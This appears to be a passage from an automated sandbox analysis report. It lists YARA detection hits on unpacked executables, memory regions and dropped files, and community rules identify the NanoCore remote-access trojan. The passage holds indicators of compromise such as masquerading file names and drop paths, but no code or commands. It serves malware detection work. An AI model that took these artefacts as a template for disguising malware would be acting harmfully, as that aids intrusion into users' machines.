            Source: Yara matchFile source: 21.0.Synaptics.exe.4b8e54.19.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.584130.22.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.2.Synaptics.exe.584130.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 19.2.dhcpmon.exe.e20000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.400000.21.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.400000.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.._cache_WINDOWS.EXE.59e4629.8.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4b8e54.34.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4b8e54.23.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.y8kdmHi6x3.exe.4b8e54.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.Synaptics.exe.46d40a4.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 15.2.Synaptics.exe.4eb40a4.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.2.Synaptics.exe.4b8e54.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.400000.26.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.4b8e54.19.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.584130.32.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 19.2.dhcpmon.exe.461ebcc.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.WINDOWS.EXE.4b8e14.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.y8kdmHi6x3.exe.45f40a4.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.Synaptics.exe.4bba750.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.2.Synaptics.exe.584130.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.._cache_WINDOWS.EXE.3bdebcc.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.4b8e54.23.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.400000.16.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.400000.21.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.0.WINDOWS.EXE.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.400000.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4c4d1c.18.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.400000.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.Synaptics.exe.46dff6c.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 15.2.Synaptics.exe.4ebff6c.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.4c4d1c.23.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.4b8e54.24.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.400000.10.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.400000.14.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.2.Synaptics.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 15.2.Synaptics.exe.4eb40a4.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 15.2.Synaptics.exe.4dba750.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.Synaptics.exe.4bba750.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000013.00000002.380515314.0000000000E22000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001F.00000000.406005434.0000000000832000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000018.00000002.401049585.0000000000E7F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000000.349954370.0000000000D72000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000027.00000000.430706138.00000000004A5000.00000002.00000001.01000000.00000010.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000000.401578463.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.562480973.00000000059E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000000.404128666.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001A.00000002.412834234.00000000004A5000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000022.00000000.415586772.0000000000F32000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000018.00000000.392435877.0000000000E7F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000000.420990382.00000000000FF000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000000.356343368.0000000000E22000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000022.00000002.439856260.0000000000F32000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000000.388059549.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000002.431447633.00000000000FF000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.561753594.0000000003BD7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000000.329629304.00000000004A5000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000028.00000002.460036376.0000000003ED1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000027.00000002.441301976.00000000004A5000.00000002.00000001.01000000.00000010.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000028.00000000.439738650.00000000008E2000.00000002.00000001.01000000.00000011.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000000.390475509.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000002.417653653.00000000004A5000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000000.386810827.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000002.381330192.00000000045D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.558823372.00000000005B2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.422157438.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000022.00000002.441431426.0000000003711000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000000.384287270.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000002.526679054.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001B.00000000.400361614.0000000000E7F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001A.00000000.400197509.00000000004A5000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000000.334103669.00000000005B2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.376096056.0000000004331000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001F.00000002.436004480.0000000000832000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000028.00000002.459917090.0000000002ED1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001B.00000002.406913050.0000000000E7F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000000.429485363.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.374769254.0000000000D72000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000000.443173289.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000000.317487314.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000028.00000002.459034432.00000000008E2000.00000002.00000001.01000000.00000011.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000000.323345675.00000000003CF000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000022.00000002.441940953.0000000004711000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000002.401818941.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001F.00000002.440103209.0000000003F51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.329527934.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.330595199.00000000003CF000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000000.316599175.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.375988189.0000000003331000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000002.381281938.00000000035D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001F.00000002.439646112.0000000002F51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000000.405483096.00000000004A5000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.404592341.0000000004B59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.434303523.0000000004D59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.423679022.0000000004579000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.330915609.0000000004499000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: y8kdmHi6x3.exe PID: 5268, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: y8kdmHi6x3.exe PID: 4844, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: ._cache_y8kdmHi6x3.exe PID: 6232, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Synaptics.exe PID: 6964, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: WINDOWS.EXE PID: 7016, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: ._cache_WINDOWS.EXE PID: 6580, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Synaptics.exe PID: 4928, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Synaptics.exe PID: 6632, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: ._cache_WINDOWS.EXE PID: 6692, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: dhcpmon.exe PID: 5244, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Synaptics.exe PID: 5684, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Synaptics.exe PID: 4964, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Synaptics.exe PID: 5976, type: MEMORYSTR
            Source: Yara matchFile source: C:\Users\user\Desktop\._cache_WINDOWS.EXE, type: DROPPED
            Source: Yara matchFile source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, type: DROPPED
            Source: Yara matchFile source: C:\Users\user\Desktop\._cache_y8kdmHi6x3.exe, type: DROPPED
            Source: Yara matchFile source: C:\Users\user\Desktop\WINDOWS.EXE, type: DROPPED
            Source: Yara matchFile source: C:\ProgramData\Synaptics\._cache_Synaptics.exe, type: DROPPED
            Source: Yara matchFile source: C:\Users\user\Desktop\._cache_Synaptics.exe, type: DROPPED

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 11.0.._cache_WINDOWS.EXE.5b0000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 11.0.._cache_WINDOWS.EXE.5b0000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 16.2.._cache_WINDOWS.EXE.d70000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 16.2.._cache_WINDOWS.EXE.d70000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 20.2.Synaptics.exe.584130.3.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 20.2.Synaptics.exe.584130.3.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 16.0.._cache_WINDOWS.EXE.d70000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 16.0.._cache_WINDOWS.EXE.d70000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 20.0.Synaptics.exe.584130.24.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 20.0.Synaptics.exe.584130.24.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 16.2.._cache_WINDOWS.EXE.437ebcc.4.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 20.0.Synaptics.exe.584130.29.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 20.0.Synaptics.exe.584130.29.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 21.0.Synaptics.exe.584130.22.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 21.0.Synaptics.exe.584130.22.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 21.0.Synaptics.exe.584130.18.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 21.0.Synaptics.exe.584130.18.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 15.2.Synaptics.exe.4dba750.5.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 15.2.Synaptics.exe.4dba750.5.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 6.2.._cache_y8kdmHi6x3.exe.48e4dc.1.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 6.2.._cache_y8kdmHi6x3.exe.48e4dc.1.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 11.2.._cache_WINDOWS.EXE.59e0000.7.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 20.0.Synaptics.exe.584130.17.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 20.0.Synaptics.exe.584130.17.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 4.0.y8kdmHi6x3.exe.4c4d1c.17.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 4.0.y8kdmHi6x3.exe.4c4d1c.17.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 20.2.Synaptics.exe.584130.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 20.2.Synaptics.exe.584130.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 20.0.Synaptics.exe.4b8e54.23.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 20.0.Synaptics.exe.4b8e54.23.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 6.0.._cache_y8kdmHi6x3.exe.48e4dc.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 6.0.._cache_y8kdmHi6x3.exe.48e4dc.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 20.0.Synaptics.exe.4b8e54.19.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 20.0.Synaptics.exe.4b8e54.19.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 21.2.Synaptics.exe.4b8e54.3.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 21.2.Synaptics.exe.4b8e54.3.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 4.0.y8kdmHi6x3.exe.4c4d1c.23.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 4.0.y8kdmHi6x3.exe.4c4d1c.23.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 9.0.WINDOWS.EXE.4b8e14.1.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 9.0.WINDOWS.EXE.4b8e14.1.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 11.2.._cache_WINDOWS.EXE.5b0000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 11.2.._cache_WINDOWS.EXE.5b0000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 8.2.Synaptics.exe.4cb40a4.5.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 8.2.Synaptics.exe.4cb40a4.5.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 19.2.dhcpmon.exe.46231f5.4.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 23.0.Synaptics.exe.584130.18.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 23.0.Synaptics.exe.584130.18.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 21.2.Synaptics.exe.584130.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 21.2.Synaptics.exe.584130.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 21.0.Synaptics.exe.584130.22.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 21.0.Synaptics.exe.584130.22.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 21.0.Synaptics.exe.584130.18.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 21.0.Synaptics.exe.584130.18.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 21.0.Synaptics.exe.400000.21.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 21.0.Synaptics.exe.400000.21.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 20.0.Synaptics.exe.584130.32.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 20.0.Synaptics.exe.584130.32.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 23.0.Synaptics.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 23.0.Synaptics.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 4.2.y8kdmHi6x3.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 4.2.y8kdmHi6x3.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 11.2.._cache_WINDOWS.EXE.2ba178c.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 4.2.y8kdmHi6x3.exe.4b8e54.3.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 4.2.y8kdmHi6x3.exe.4b8e54.3.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 4.0.y8kdmHi6x3.exe.400000.16.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 4.0.y8kdmHi6x3.exe.400000.16.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 20.0.Synaptics.exe.4b8e54.28.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 20.0.Synaptics.exe.4b8e54.28.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 21.2.Synaptics.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 21.2.Synaptics.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 4.0.y8kdmHi6x3.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 4.0.y8kdmHi6x3.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 21.0.Synaptics.exe.4b8e54.24.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 21.0.Synaptics.exe.4b8e54.24.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 20.0.Synaptics.exe.4c4d1c.22.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 0.2.y8kdmHi6x3.exe.45f40a4.4.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 0.2.y8kdmHi6x3.exe.45f40a4.4.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 20.0.Synaptics.exe.4c4d1c.22.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 23.0.Synaptics.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 23.0.Synaptics.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 4.0.y8kdmHi6x3.exe.4b8e54.24.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 4.0.y8kdmHi6x3.exe.4b8e54.24.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 4.0.y8kdmHi6x3.exe.4b8e54.19.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 4.0.y8kdmHi6x3.exe.4b8e54.19.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 20.0.Synaptics.exe.4c4d1c.27.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 20.0.Synaptics.exe.4c4d1c.27.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 4.0.y8kdmHi6x3.exe.4b8e54.19.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 4.0.y8kdmHi6x3.exe.4b8e54.19.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 4.0.y8kdmHi6x3.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 4.0.y8kdmHi6x3.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 0.2.y8kdmHi6x3.exe.44fa750.5.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 0.2.y8kdmHi6x3.exe.44fa750.5.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 21.0.Synaptics.exe.4c4d1c.17.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 21.0.Synaptics.exe.4c4d1c.17.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 19.2.dhcpmon.exe.35f3dc4.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 20.0.Synaptics.exe.4b8e54.34.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 20.0.Synaptics.exe.4b8e54.34.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 6.2.._cache_y8kdmHi6x3.exe.3c0000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 6.2.._cache_y8kdmHi6x3.exe.3c0000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 20.2.Synaptics.exe.4c4d1c.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 20.2.Synaptics.exe.4c4d1c.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 23.0.Synaptics.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 23.0.Synaptics.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 6.0.._cache_y8kdmHi6x3.exe.48e4dc.1.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 6.0.._cache_y8kdmHi6x3.exe.48e4dc.1.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 21.0.Synaptics.exe.4b8e54.24.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 21.0.Synaptics.exe.4b8e54.24.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 21.0.Synaptics.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 21.0.Synaptics.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
